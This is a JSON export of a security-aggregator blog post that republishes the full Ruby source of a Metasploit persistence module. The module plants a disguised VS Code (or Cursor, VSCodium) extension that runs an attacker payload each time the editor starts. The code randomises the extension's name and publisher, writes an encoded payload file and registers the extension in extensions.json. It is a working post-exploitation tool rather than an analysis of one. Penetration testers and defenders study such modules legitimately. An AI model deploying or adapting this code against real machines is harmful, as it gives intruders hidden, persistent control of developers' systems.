{"id":62047,"date":"2026-06-11T14:53:14","date_gmt":"2026-06-11T14:53:14","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=62047"},"modified":"2026-06-11T14:53:14","modified_gmt":"2026-06-11T14:53:14","slug":"vs-code-extension-persistence","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=62047","title":{"rendered":"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION-"},"content":{"rendered":"

{“lastseen”:”2026-06-11T19:28:04″,”description”:”This module installs a malicious VS Code extension into the target’s VS Code extensions directory. The extension executes the payload each time VS Code is launched, providing persistent code execution. Supports VS Code, VS Code Insiders, VSCodium, VS…”,”published”:”2026-06-11T19:00:41″,”modified”:”2026-06-11T19:00:41″,”type”:”metasploit”,”title”:”VS Code Extension Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n# frozen_string_literal: true\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Unix # whoami\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘VS Code Extension Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module installs a malicious VS Code extension into the target’s\\n VS Code extensions directory. The extension executes the payload each time\\n VS Code is launched, providing persistent code execution. Supports VS Code,\\n VS Code Insiders, VSCodium, VS Code Server, and Cursor.\\n\\n Tested against 1.120.0 on Kali and Windows 10\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die’,\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2015-04-29’, # VS Code first public release\\n ‘SessionTypes’ =\\u003e [‘shell’, ‘meterpreter’],\\n ‘Privileged’ =\\u003e false,\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/code.visualstudio.com\/api\/get-started\/your-first-extension’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1176_SOFTWARE_EXTENSIONS]\\n ],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Platform’ =\\u003e %w[linux windows],\\n ‘Payload’ =\\u003e {\\n ‘Space’ =\\u003e 8191,\\n ‘DisableNops’ =\\u003e true\\n },\\n ‘Targets’ =\\u003e [\\n [‘Windows’, { ‘Platform’ =\\u003e ‘windows’ }],\\n [‘Linux’, { ‘Platform’ =\\u003e [‘unix’, ‘linux’] }],\\n # [‘OSX’, { ‘Platform’ =\\u003e ‘osx’ }] this likely works but I don’t have a test environment to verify it, so leaving it out of the target list for now\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n },\\n ‘DefaultTarget’ =\\u003e 0\\n )\\n )\\n\\n register_options([\\n OptString.new(‘NAME’, [false, ‘Name of the extension (Random if left blank)’, ”]),\\n OptString.new(‘PUBLISHER’, [false, ‘Publisher name for the extension (Random if left blank)’, ”]),\\n OptString.new(‘DESCRIPTION’, [false, ‘Description of the extension (Random if left blank)’, ”]),\\n OptString.new(‘USER’, [false, ‘User to target, or current user if blank’, ”]),\\n OptPath.new(‘ICON’, [false, ‘Local path to an icon file (PNG) to include with the extension’]),\\n OptString.new(‘VERSION’, [false, ‘Extension version in major.minor.patch format’, ‘1.0.0’])\\n ])\\n deregister_options(‘WritableDir’)\\n end\\n\\n def ext_name\\n @ext_name ||= datastore[‘NAME’].blank? ? rand_text_alphanumeric(4..10).downcase : datastore[‘NAME’].downcase\\n end\\n\\n def ext_publisher\\n @ext_publisher ||= datastore[‘PUBLISHER’].blank? ? rand_text_alpha(4..8).downcase : datastore[‘PUBLISHER’].downcase\\n end\\n\\n def ext_version\\n @ext_version ||= begin\\n ver = datastore[‘VERSION’].blank? ? ‘1.0.0’ : datastore[‘VERSION’]\\n fail_with(Failure::BadConfig, \\”VERSION must be in major.minor.patch format (e.g. 1.0.0), got: #{ver}\\”) unless ver.match?(\/\\\\A\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\z\/)\\n ver\\n end\\n end\\n\\n def ext_dir_name\\n \\”#{ext_publisher}.#{ext_name}-#{ext_version}\\”\\n end\\n\\n def package_json\\n pkg = {\\n ‘name’ =\\u003e ext_name,\\n ‘displayName’ =\\u003e ext_name,\\n ‘description’ =\\u003e datastore[‘DESCRIPTION’].blank? ? ” : datastore[‘DESCRIPTION’],\\n ‘version’ =\\u003e ext_version,\\n ‘publisher’ =\\u003e ext_publisher,\\n ‘engines’ =\\u003e { ‘vscode’ =\\u003e ‘^1.0.0’ },\\n ‘activationEvents’ =\\u003e [‘*’],\\n ‘main’ =\\u003e ‘.\/extension.js’\\n }\\n pkg[‘icon’] = \\”.\/#{::File.basename(datastore[‘ICON’])}\\” unless datastore[‘ICON’].blank?\\n pkg.to_json\\n end\\n\\n def extension_js\\n template_path = ::File.join(Msf::Config.data_directory, ‘exploits’, ‘vscode_extension’, ‘extension.js.template’)\\n fail_with(Failure::BadConfig, \\”Extension template not found: #{template_path}\\”) unless ::File.exist?(template_path)\\n\\n ::File.read(template_path)\\n end\\n\\n def target_user\\n return datastore[‘USER’] unless datastore[‘USER’].blank?\\n\\n return cmd_exec(‘cmd.exe \/c echo %USERNAME%’).strip if windows?\\n\\n whoami\\n end\\n\\n def windows?\\n [‘windows’, ‘win’].include?(session.platform)\\n end\\n\\n # def osx?\\n # session.platform == ‘osx’\\n # end\\n\\n def vscode_ext_dirs\\n user = target_user\\n vprint_status(\\”Target user: #{user}\\”)\\n\\n if windows?\\n [\\n \\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\.vscode\\\\\\\\extensions\\”,\\n \\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\.vscode-insiders\\\\\\\\extensions\\”,\\n \\”C:\\\\\\\\Users\\\\\\\\#{user}\\\\\\\\.cursor\\\\\\\\extensions\\”\\n ]\\n # when ‘osx’ \u2014 uncomment and add ‘osx’ to Platform\/Targets once verified on macOS\\n # [\\n # \\”\/Users\/#{user}\/.vscode\/extensions\\”,\\n # \\”\/Users\/#{user}\/.vscode-insiders\/extensions\\”,\\n # \\”\/Users\/#{user}\/.vscode-oss\/extensions\\”,\\n # \\”\/Users\/#{user}\/.cursor\/extensions\\”\\n # ]\\n else\\n home = user == ‘root’ ? ‘\/root’ : \\”\/home\/#{user}\\”\\n [\\n \\”#{home}\/.vscode\/extensions\\”,\\n \\”#{home}\/.vscode-insiders\/extensions\\”,\\n \\”#{home}\/.vscode-server\/extensions\\”,\\n \\”#{home}\/.vscode-oss\/extensions\\”,\\n \\”#{home}\/.cursor\/extensions\\”,\\n \\”#{home}\/snap\/code\/current\/.config\/Code\/extensions\\”\\n ]\\n end\\n end\\n\\n def check\\n vscode_ext_dirs.each do |dir|\\n next unless directory?(dir)\\n if !windows? \\u0026\\u0026 !writable?(dir)\\n return CheckCode::Appears(\\”VS Code extensions directory found but not writable: #{dir}\\”)\\n end\\n\\n return CheckCode::Appears(\\”VS Code extensions directory found: #{dir}\\”)\\n end\\n\\n CheckCode::Safe(‘No VS Code extensions directory found’)\\n rescue StandardError =\\u003e e\\n CheckCode::Unknown(\\”Error checking for VS Code: #{e.message}\\”)\\n end\\n\\n def vscode_running?\\n if windows?\\n !cmd_exec(‘powershell -Command \\”Get-Process -Name Code* -ErrorAction SilentlyContinue\\”‘).strip.empty?\\n else\\n # The [c]ode bracket trick prevents the grep process itself from matching\\n !cmd_exec(‘ps -ef 2\\u003e\/dev\/null | grep -i \\”[c]ode\\”‘).strip.empty?\\n end\\n end\\n\\n # VS Code URI path format for Windows: \/c:\/users\/… (lowercase drive, forward slashes)\\n def uri_path(full_path)\\n return full_path unless windows?\\n\\n ‘\/’ + full_path.gsub(‘\\\\\\\\’, ‘\/’).sub(\/^([A-Za-z]):\/) { \\”#{::Regexp.last_match(1).downcase}:\\” }\\n end\\n\\n def register_extension(ext_base, ext_dir)\\n sep = windows? ? ‘\\\\\\\\’ : ‘\/’\\n index_path = \\”#{ext_base}#{sep}extensions.json\\”\\n\\n extensions = []\\n if file?(index_path)\\n print_status(‘Reading extensions.json…’)\\n begin\\n extensions = JSON.parse(read_file(index_path))\\n # Remove any stale entry for this extension id\\n extensions.reject! { |e| e.dig(‘identifier’, ‘id’)\\u0026.casecmp?(\\”#{ext_publisher}.#{ext_name}\\”) }\\n rescue JSON::ParserError =\\u003e e\\n print_warning(\\”Could not parse extensions.json: #{e.message} – starting fresh\\”)\\n extensions = []\\n end\\n end\\n\\n entry = {\\n ‘identifier’ =\\u003e { ‘id’ =\\u003e \\”#{ext_publisher}.#{ext_name}\\” },\\n ‘version’ =\\u003e ext_version,\\n ‘location’ =\\u003e {\\n ‘$mid’ =\\u003e 1,\\n ‘fsPath’ =\\u003e ext_dir,\\n ‘path’ =\\u003e uri_path(ext_dir),\\n ‘scheme’ =\\u003e ‘file’\\n },\\n ‘relativeLocation’ =\\u003e ext_dir_name,\\n ‘metadata’ =\\u003e {\\n ‘id’ =\\u003e SecureRandom.uuid,\\n ‘publisherId’ =\\u003e SecureRandom.uuid,\\n ‘publisherDisplayName’ =\\u003e ext_publisher,\\n ‘targetPlatform’ =\\u003e ‘undefined’,\\n ‘isPreReleaseVersion’ =\\u003e false,\\n ‘hasPreReleaseVersion’ =\\u003e false,\\n ‘installedTimestamp’ =\\u003e (Time.now.to_f * 1000).to_i,\\n ‘pinned’ =\\u003e false,\\n ‘isApplicationScoped’ =\\u003e false,\\n ‘updated’ =\\u003e false,\\n ‘preRelease’ =\\u003e false\\n }\\n }\\n\\n extensions \\u003c\\u003c entry\\n write_file(index_path, JSON.generate(extensions))\\n print_good(\\”Registered extension in #{index_path}\\”)\\n index_path\\n end\\n\\n def install_persistence\\n print_status(\\”Using extension: #{ext_dir_name}\\”)\\n\\n ext_base = vscode_ext_dirs.find { |dir| directory?(dir) }\\n fail_with(Failure::NotFound, ‘No VS Code extensions directory found’) if ext_base.nil?\\n\\n print_status(\\”Installing to: #{ext_base}\\”)\\n\\n sep = windows? ? ‘\\\\\\\\’ : ‘\/’\\n ext_dir = \\”#{ext_base}#{sep}#{ext_dir_name}\\”\\n\\n unless directory?(ext_dir)\\n print_status(\\”Creating extension directory: #{ext_dir}\\”)\\n mkdir(ext_dir, cleanup: false)\\n end\\n\\n pkg_path = \\”#{ext_dir}#{sep}package.json\\”\\n fail_with(Failure::UnexpectedReply, \\”Failed to write #{pkg_path}\\”) unless write_file(pkg_path, package_json)\\n print_good(\\”Wrote package.json to #{pkg_path}\\”)\\n\\n js_path = \\”#{ext_dir}#{sep}extension.js\\”\\n fail_with(Failure::UnexpectedReply, \\”Failed to write #{js_path}\\”) unless write_file(js_path, extension_js)\\n print_good(\\”Wrote extension.js to #{js_path}\\”)\\n\\n unless datastore[‘ICON’].blank?\\n icon_data = ::File.binread(datastore[‘ICON’])\\n fail_with(Failure::BadConfig, \\”ICON is not a valid PNG file: #{datastore[‘ICON’]}\\”) unless icon_data.b.start_with?(\\”\\\\x89PNG\\\\r\\\\n\\\\x1a\\\\n\\”.b)\\n\\n icon_path = \\”#{ext_dir}#{sep}#{::File.basename(datastore[‘ICON’])}\\”\\n fail_with(Failure::UnexpectedReply, \\”Failed to write #{icon_path}\\”) unless write_file(icon_path, icon_data)\\n print_good(\\”Wrote icon to #{icon_path}\\”)\\n end\\n\\n ext_path = \\”#{ext_dir}#{sep}external\\”\\n fail_with(Failure::UnexpectedReply, \\”Failed to write #{ext_path}\\”) unless write_file(ext_path, [payload.encoded].pack(‘m0’))\\n print_good(\\”Wrote payload to #{ext_path}\\”)\\n\\n register_extension(ext_base, ext_dir)\\n\\n if vscode_running?\\n print_warning(‘VS Code is currently running – restart VS Code to activate the extension.’)\\n else\\n print_status(‘VS Code is not running – launch it to trigger the extension.’)\\n end\\n\\n @clean_up_rc \\u003c\\u003c \\”rm -rf \\\\\\”#{ext_dir}\\\\\\”\\\\n\\”\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/persistence\/vscode_extension.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/persistence\/vscode_extension\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-11T19:28:04″,”description”:”This module installs a malicious VS Code extension into the target’s VS Code extensions directory. The extension executes the payload each time VS Code is…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-62047","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nVS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=62047\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-11T19:28:04″,”description”:”This module installs a malicious VS Code extension into the target’s VS Code extensions directory. The extension executes the payload each time VS Code is...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=62047\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-11T14:53:14+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62047#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62047\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION-\",\"datePublished\":\"2026-06-11T14:53:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62047\"},\"wordCount\":1715,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=62047#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62047\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62047\",\"name\":\"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-11T14:53:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62047#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=62047\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=62047#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=62047","og_locale":"en_US","og_type":"article","og_title":"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION- zero redgem","og_description":"{“lastseen”:”2026-06-11T19:28:04″,”description”:”This module installs a malicious VS Code extension into the target’s VS Code extensions directory. The extension executes the payload each time VS Code is...","og_url":"https:\/\/zero.redgem.net\/?p=62047","og_site_name":"zero redgem","article_published_time":"2026-06-11T14:53:14+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=62047#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=62047"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION-","datePublished":"2026-06-11T14:53:14+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=62047"},"wordCount":1715,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=62047#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=62047","url":"https:\/\/zero.redgem.net\/?p=62047","name":"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-11T14:53:14+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=62047#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=62047"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=62047#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"VS Code Extension Persistence_MSF:EXPLOIT-MULTI-PERSISTENCE-VSCODE_EXTENSION-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/62047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=62047"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/62047\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=62047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=62047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=62047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}